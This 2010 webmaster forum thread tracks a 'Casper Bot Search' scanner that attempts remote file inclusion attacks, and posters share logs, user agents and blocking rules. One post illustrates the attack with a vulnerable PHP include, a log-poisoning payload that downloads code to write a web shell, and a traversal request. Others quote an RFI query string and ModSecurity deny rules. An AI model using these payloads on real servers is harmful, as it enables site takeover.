Welcome to WebmasterWorld Guest from 23.22.220.37

Forum Moderators: Ocean10000 & incrediBILL

Message Too Old, No Replies

casper bot search attempts to infect sites

user agent changing almost daily

     
10:47 pm on Jun 28, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Seen quite a few of these over the past few days, generally in groups of half a dozen-ish. (Title is complete UA with correct spelling.)

Behaviour is odd: every hit seems to be to the same site and page with (probably) the same unique querystring (this denotes an actual file to download or view). At the END of the querystring the file's extension (.ged) is replaced by:
.%20%E2%80%A6/contact.php

This seems to be consistent, although I've only carried out a few spot-checks. It also indicates a hack attempt, since the site is not PHP anyway. It's odd that the characters are upper-ASCII apart from the space, suggesting a non-Latin character set.

Hits come from different IPs, sometimes repeats of previous ones (perhaps 5 or 6 IPs involved). All IPs seems to be from server farms apart from one which could be a server on a static business DSL line. Servers include softlayer and a multi-country (RIPE) server farm.

Initially I thought "distributed bot" but being from servers this is unlikely unless it's a proper bot such as camont, and there is almost nothing to indicate it might be (SEs show next to nothing apart from logs, which indicate I'm not alone).

Possibly it's a broken bot (replacing only the file extension seems dumb unless there is an exploitable system that includes those three letters).

Any ideas, folks?
1:34 pm on June 29, 2010 (gmt 0)

New User

5+ Year Member

joined:Apr 2, 2010
posts:1
votes: 0


One of my web sites was hacked a few hours ago and I think this is done by this bot. Or it just search for vulnerability and reports it to the actual hacker. All files were removed and index.php and casper.php along with some other files were created in the root folder. There was a message like "hacked by casper" inside one of the files.
The site was build on e107, don't remember the actual version but it was definitely not the latest one.
More info is on the [e107.org...] web site.
7:56 pm on June 29, 2010 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:5795
votes: 64


The the UA string begin with casper?
10:41 pm on June 29, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


If you mean me, keyplyr, The UA I gave in the title is the complete UA. :)

More today, including russian servers (which seems to predominate) and an australian server.

BitStrike - what were the logged URLs and querystrings?

Can't see how it could be a hack unless the querystring syntax broke the server? Is there a "ged" within your site's pagenames/querystrings?

I suppose the contact form page could compromise a server if it stores data into a SQL database but then there would have to be a second payload hit, I should have thought, which is a bit wasteful.

Just had another search on google. This forum/topic at the top and thereafter almost nothing but logs until about #60 when it gives a forum reference. Sadly google seems to have screwed up its translation service because it translated german into german (and in another case french into french). They really are getting worse! :(
2:01 am on June 30, 2010 (gmt 0)

New User

5+ Year Member

joined:June 30, 2010
posts:36
votes: 0


Here are the 3 UAs I've found so far-

Casper Bot Search
dex Bot Search
Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)

I'm 403'ing anything presenting this user agent, then a script which runs every 15 mins adds a firewall rule for that IP. (They won't even be able to connect to the server, let alone request anything)

I've counted 268 unique IPs since just over a week ago, so I wouldn't be surprised if the requests are coming from compromised boxes.
4:21 pm on June 30, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


I haven't seen dex bot.

I trapped the mozilla one for a couple of reasons without checking further but yes, it does have the contact.php querystring.

147 hits for contact.php, 142 for casper.
10:50 pm on June 30, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


I've had a look at a few logs that google returns in serps. They do not seem to include the /contact.php but always seem to be the same querystring, though I've only checked half a dozen logs. The querystrings in those I looked at carry the word "casper" as in:

/casper/Ckrid1.txt?

(this seems to be a common point in the logs).

I tried looking in the actual file (a gedcom) for the name "casper" and it's not there so another theory bites the dust.

One google posting mentions casper doing a POST but very little other info. A couple of the serps relate it to exploits.

I have now found a couple of other forums saying this is an exploit attempt aimed at various things including PDFs. Type the following, including quotes, into google:

"casper bot search" exploit

One translated site mentions a "casper rule" which defines the life of something: not sure what as I ran out of patience trying to translate a wiki.

What I can't understand is its persistent hits on a single site/page/querystring. Every single hit, apart from the 404s it generates. For any kind of bot or exploit this is stupid.
4:53 pm on July 1, 2010 (gmt 0)

Junior Member

10+ Year Member

joined:June 25, 2005
posts:179
votes: 1


UA of "CASPER RFI CRACK Bot" seems to have been changed.

Yesterday:
$ua->agent('Casper Bot Search');

and
my $uagent = "Casper Bot Search";


Today:
$ua->agent('Mozilla/5.0');

and
my $uagent = "Mozilla/5.0";
7:57 pm on July 2, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Haven't seen that but it's now coming in with exactly the same querystring but with the UA:

sledink bot search

I guess this will morph a few more times as traps develop to kill known UAs. Generalisation helps!
10:24 am on July 3, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 5+ Year Member

joined:Apr 30, 2007
posts:1394
votes: 0


$ua->agent('Casper Bot Search'); ........ etc.


Looks like a classic hack attempt.

example: vulnerable local script contains code
<?php
include($_GET['p'].".php");
?>

Attacker synthesizes user agent code (sample you may see in the server logs not encoded they use all kinds of things)
<?php
fwrite(fopen('shell.php','w'),
file_get_contents('http://www.example.com/injection.txt'));
?>

it is then utilized with a server request from the attacker:
index.php?p=/var/log/apache/access_log%00

executing the php code or try to see if the scripts disclose any other info.

I hope you get the idea and this is not original by any means there lots of discussions over the web if you want to search in depth. The code logged as a UA can have many variations.

Also they're trying different combinations based on server type and application language.
2:58 pm on July 3, 2010 (gmt 0)

Junior Member

10+ Year Member

joined:June 25, 2005
posts:179
votes: 1


Another UA:
rk q kangen
10:06 pm on July 3, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Three or four variations on "x bot search" UA today. Still hitting the same site.page.querystring exactly with one variation from contact.php to discover.
12:57 am on July 6, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


Yikes!

I haven't been paying attention but this one is nasty

I've seen UAs of "Casper Bot Search", "rk q kangen" and "MaMa CaSpEr"

They're all trying to find ways to upload files to my site such as:
"somepage.html?path=http://www.example.com/www/data/casper/Ckrid1.txt?"

I would block anything with "/casper/" in the query string as an added measure of protection.
9:42 pm on July 6, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Not just casper. I would suggest anything with "bot search" in the UA as that seems to be common to many (all?) I've seen so far, including "dex" and "plaNETWORK" (sic).

Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

All those I've seen seem to come from compromised servers from ThePlanet down to tin-pot little RIP ones I've never encountered before. In fact there have been a lot of the latter!

I've only caught two new IPs today (although several old ones) so perhaps they're running out of server farms I haven't yet blocked.

And most are from server farms, with just two or three from business ranges that are probably running open servers.

I still can't understand why they're only hitting one site out of several dozen, and only a single page. Seems very inefficient to me. But hey! let's root for inefficiency! :)
12:21 am on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:May 31, 2005
posts:1108
votes: 0


Same bot, new UA MaMa CaSpEr
Also pointing a parameter to Ckrid1.txt
9:24 am on July 7, 2010 (gmt 0)

New User

5+ Year Member

joined:Apr 16, 2010
posts:12
votes: 0


Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

How about to just allow several popular bot to access your site? Additionally one could perform DNS reverse lookup to ensure the origin of that bot.

popular UA: [user-agents.org...]

how to verify bot: [google.com...]

----

Below could be another way to identify a bad bot..

source: Google Webmaster Blog..In order to fetch from the "official" Googlebot IP range, the bot has to respect robots.txt and our internal hostload conventions so that Google doesn't crawl you too hard.

then you might create hidden link > block it via robot.txt > see if any bot reach that link > get the ip > block it!

just my 2cents
12:30 pm on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Dec 20, 2004
posts:2377
votes: 0


How can you tell if your server has been compromised? We see this bot hitting our logs (only about 30 attempts since June 21st).

I don't see a new "index.php" or "casper.php" in my root. Any other symptoms to watch out for?
12:41 pm on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Dec 20, 2004
posts:2377
votes: 0


I may be worth noting that there is a city named Casper in Wyoming. Not sure if that affects anyone who is blocking "Casper" in the query string.
4:37 pm on July 7, 2010 (gmt 0)

New User

5+ Year Member

joined:Jan 18, 2007
posts:6
votes: 0


It appears to be an e107 issue, with a security bug in contact.php. Another user agent I found is: "kmccrew Bot Search".

@max, symptoms not clear. One may consider to block POST queries with a user agent as mentioned above (not: query strings).
6:23 pm on July 7, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Ujang, thanks but I have it covered. I'm merely speculating on hits I see and trying to help out here. :)
7:21 pm on July 7, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


One may consider to block POST queries with a user agent as mentioned above (not: query strings)


The hits on my site aren't POSTS, they are GETS, so the query string is where I block the attack by actually restricting anything with "http:" in the query string to prevent anything from being uploaded since the rest of the attack vectors seem to be random.

Of course this will break some software/sites so I don't recommend it for everyone, but it stops it cold on my server.
8:41 pm on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Dec 20, 2004
posts:2377
votes: 0


Mine are GET requests as well.
9:26 pm on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 5+ Year Member

joined:Feb 16, 2007
posts:846
votes: 0


Profo are you sure e107 is related? Haven't seen 'Casper' at all.

e107 probes: e107.css on May 25 to the ip address with the old Toata dragostea UA, and contact.php on June 14 to a handful of domains with a Googlebot UA.
10:35 pm on July 7, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


All the casper hits today were POSTs. Haven't checked earlier logs but the pattern is the same in my security logs and always trying to hit contact.php. The contact.php in the querystring looks like some reaction to the simple POST to contact.php (without a querystring), which precedes the querystring hit. Both hits get 403's.
10:52 pm on July 7, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


OK, I stand corrected, most of the activity today is totally different from the past few days.

Mostly seeing this coming from So. Korea:
"POST /I[DEX]887 HTTP/1.1" "MaMa CaSpEr"


I don't even know what the heck "/I[DEX]887" is or why anyone would try to post to it but those stupid scripts tried about 30 times with some variations.

Also had a couple of "contact.php" hits from Germany with a Firefox UA:
"POST /contact.php HTTP/1.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"


Wonder why the sudden shift from GET to POST?

At a minimum the POST no longer exposes the source of the file they're attempting to upload in a log file so it makes it a little harder to figure out the source of the hacked computer and take it down.
12:33 am on July 8, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Dec 20, 2004
posts:2377
votes: 0


It seems to have given up our site for now (knock on wood). We last saw it on the 5th when it was still using the GET method.

That is unless it is under a name we have not checked for... which is highly likely.
1:10 pm on July 8, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Mar 23, 2002
posts:659
votes: 0


A few ModSecurity 2.x rules

SecRule HTTP_User-Agent "Casper" "deny,log,status:403"
SecRule HTTP_User-Agent "kangen" "deny,log,status:403"
SecRule HTTP_User-Agent "MaMa" "deny,log,status:403"
8:06 pm on July 8, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


Is this casper thing done?

I haven't seen a single hit from any of it's variants today.
9:18 pm on July 8, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Still coming as of a couple of hours ago.

If anyone is interested I have two sets of post/querystring data. Quite a difference between the two sets, one of which is an eval of a BASE64 string. Possibly other sets are different again but I only traced two.
8:11 pm on July 9, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


Sharing the post data would be great
Post it and I'll edit if needed
This 41 message thread spans 2 pages: 41
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members